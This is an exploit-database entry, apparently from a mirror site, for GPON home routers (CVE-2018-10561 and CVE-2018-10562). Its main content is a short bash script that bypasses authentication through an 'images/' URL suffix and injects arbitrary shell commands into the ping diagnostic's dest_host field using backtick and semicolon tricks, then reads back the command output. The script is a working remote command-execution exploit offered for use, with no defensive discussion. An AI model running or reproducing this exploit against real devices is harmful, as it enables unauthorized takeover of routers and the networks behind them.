[] NeoSense
E X P L O I T S
title author type platform port cve id

GPON Routers - Authentication Bypass / Command Injection

Author: vpnmentor
type: remote
platform: hardware
port: 
date_added: 2018-05-03 
date_updated: 2018-05-03 
verified: 0 
codes: CVE-2018-10562;CVE-2018-10561 
tags: 
aliases:  
screenshot_url:  
application_url: 
#!/bin/bash

echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.